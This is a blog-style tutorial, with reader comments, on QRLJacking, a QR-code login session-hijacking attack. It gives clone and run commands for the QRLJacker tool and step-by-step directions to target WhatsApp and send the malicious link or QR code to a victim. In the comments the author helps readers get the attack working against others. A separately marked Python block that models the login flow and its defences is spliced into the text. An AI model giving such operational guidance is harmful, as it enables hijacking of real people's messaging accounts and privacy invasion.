QRLJacking, or Quick Response Code Login Jacking, is a simple but nasty attack vector affecting all applications that rely on the “Login with QR code” feature as a secure way to log in to accounts. It lets attackers hijack users' sessions.
What is QRLJacking?
QRLJacking, or Quick Response Code Login Jacking, is a simple social engineering attack vector capable of session hijacking. It affects all applications that rely on the “Login with QR code” feature as a secure way to log in to accounts. In a nutshell, the victim scans the attacker’s QR code, which results in session hijacking.
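A minimal model of the server side of this flow, as an added example that is not part of the original post or the QRLJacking project: it shows that the session is granted to whichever browser requested the QR code, and how a short token lifetime and a network-match check change the outcome. The class, its method names, the 20-second lifetime and the network-match check are assumptions for illustration.

```python
import secrets

QR_TTL_SECONDS = 20  # assumed lifetime of a displayed QR token


class QrLoginServer:
    """Toy model of a "Login with QR code" backend; all names are hypothetical."""

    def __init__(self, bind_network=False):
        self.bind_network = bind_network
        self.pending = {}    # token -> (browser_id, browser_ip, issued_at)
        self.sessions = {}   # browser_id -> authenticated account

    def new_qr(self, browser_id, browser_ip, now):
        """A browser asks for a QR code; the token is tied to that browser."""
        token = secrets.token_urlsafe(16)
        self.pending[token] = (browser_id, browser_ip, now)
        return token

    def approve(self, token, account, phone_ip, now):
        """The logged-in mobile app submits the token it scanned."""
        entry = self.pending.pop(token, None)  # single use
        if entry is None:
            return "unknown-token"
        browser_id, browser_ip, issued_at = entry
        if now - issued_at > QR_TTL_SECONDS:
            return "expired"
        if self.bind_network and phone_ip != browser_ip:
            return "rejected-network-mismatch"
        # The session goes to the browser that requested the QR code,
        # not to whoever displayed or scanned it.
        self.sessions[browser_id] = account
        return "approved"


def scan(server, browser_ip, phone_ip, delay=5):
    """Constructed scenario: one browser requests a QR, one phone scans it."""
    token = server.new_qr("browser-1", browser_ip, now=0)
    result = server.approve(token, "alice", phone_ip, now=delay)
    return result, server.sessions.get("browser-1")


if __name__ == "__main__":
    # Constructed documentation-range addresses (RFC 5737).
    print(scan(QrLoginServer(), "203.0.113.10", "198.51.100.7"))
    print(scan(QrLoginServer(bind_network=True), "203.0.113.10", "198.51.100.7"))
    print(scan(QrLoginServer(bind_network=True), "198.51.100.7", "198.51.100.7"))
    print(scan(QrLoginServer(), "198.51.100.7", "198.51.100.7", delay=60))
```

A network-match check also rejects legitimate logins where the phone and the browser are on different networks, so it trades usability for protection.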
Download QRLJacking from GitHub
git clone https://github.com/OWASP/QRLJacking.git
Run QRLJacking
cd QRLJacking/QRLJacker
pip install -r requirements.txt
chmod +x QRLJacker.py
python QRLJacker.py
After it runs, select the first option, Chat Application, then select WhatsApp. Wait a while and it will launch the attack. Then just copy the link (for example http://localhost:1337) and send it to the victim, or convince the victim to scan the malicious QR code.
Please help me, the commands do not work in Termux
You can't run this on Termux. Try to get an Ubuntu VPS and log in to your Ubuntu VPS with Termux, then install. Check this guide here: Setting up Ubuntu VPS
When I use the framework command, it shows that there is no such file or directory
Sorry, please use this command,
cd QRLJacking/QRLJacker
Also if you read the article again, I have corrected the error.
Thanks
Dear admin, can I send the code to a person as a photo? Or does this code have an expiry time, for example 2 minutes?
It has no duration; I believe it only works when you close the program or terminate it. You can learn more about the attack vector here: QRLJacking Guide